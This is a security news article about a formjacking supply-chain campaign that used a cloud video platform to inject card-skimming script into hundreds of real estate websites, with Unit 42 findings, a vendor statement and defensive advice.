Application Security , Incident & Breach Response , Next-Generation Technologies & Secure Development
Formjacking Campaign Leverages Cloud Video PlatformAttacker Targeted Hundreds of Real Estate Websites
A new supply chain attack is targeting hundreds of real estate websites by injecting card-skimming malware into a cloud video platform.
See Also: Live Webinar | Education Cybersecurity Best Practices: Devices, Ransomware, Budgets and Resources
However, Brightcove subsequently contacted Information Security Media Group to clarify that while the attack occurred through a compromised file that was uploaded, the attack did not originate from within Brightcove and says that no Brightcove players or accounts were accessed. A Brightcove spokesperson told ISMG: "A Brightcove customer experienced a security issue that originated with videos stored by the customer on a third-party solution, and at no point were other customers, or their end-users, at risk due to this incident. Brightcove operates a highly secure video platform and offers a number of solutions to ensure a secure video experience for our customers. If our customers or partners experience security threats to their systems that would impact their use of our services, we work closely with them to remedy any vulnerabilities as quickly as possible and offer support from our team of experts."
Brightcove is a cloud-based online video platform operating from Boston, Massachusetts; it is understood to serve the 900 plus global franchise holders of New Jersey, United States headquartered Sotheby’s Realty, a luxury real estate brand founded by Sotheby's fine art dealers and run jointly with US-based Realogy Holdings Corp. While Unit 42 did not say where the websites attacked or compromised were located, they did say ‘hundreds’ of websites were targeted, making it likely the targets were global.
More than 100 real estate sites were reported by Unit 42 to have been compromised by the same skimmer attack.
"From the code analysis, we know the skimmer snippet is trying to gather victims’ sensitive information such as names, emails, phone numbers, and send them to a collection server, https://cdn-imgcloud[.]com/img, which is also marked as malicious in VirusTotal," the researchers say.
On further analysis of the sites, the researchers confirmed that the compromised sites belong to one parent company and that these sites were importing the same video - accompanied by malicious scripts - from a cloud video platform.
Casting a Wide Net
"Supply chain attacks come in many shapes and forms. While most of the headline-grabbing attacks are often targeted against large organizations, there are many instances where criminals will cast a wider net to infect as many organizations as possible," says Javvad Malik, security awareness advocate at security firm KnowBe4.
The researchers at Unit 42 say that the skimmer used is highly polymorphic, elusive and continuously evolving. When combined with cloud distribution platforms, they say, a skimmer of this type can have a very large impact.
"We have to invent more sophisticated strategies to detect skimmer campaigns of this type, since merely blocking domain names or URLs used by skimmers is ineffective," the researchers say.
No Easy Fix
Malik says that many industries use shared services for documents, videos and photos. "These are often most susceptible to attack and can go undetected for longer," he says, and he recommends that organizations carefully vet third parties and use monitoring controls to check for unexpected behavior.
"Unfortunately, there isn't an easy fix for supply chain attacks, and it involves all concerned parties to do their part in ensuring everyone remains secure," Malik says.
The researchers say that they worked with the cloud video platform and the real estate company to help remove this malware prior to the publication of their blog post and add: "We're publishing this piece to alert organizations and web surfers of the potential for supply chain attacks to infect legitimate websites without the knowledge of those organizations."
They recommend that website administrators safeguard any accounts and ensure they manage permissions well to avoid theft by phishing or social engineering. They also say users should conduct web content integrity checks on a regular basis to help detect and prevent injection of malicious code into the website content.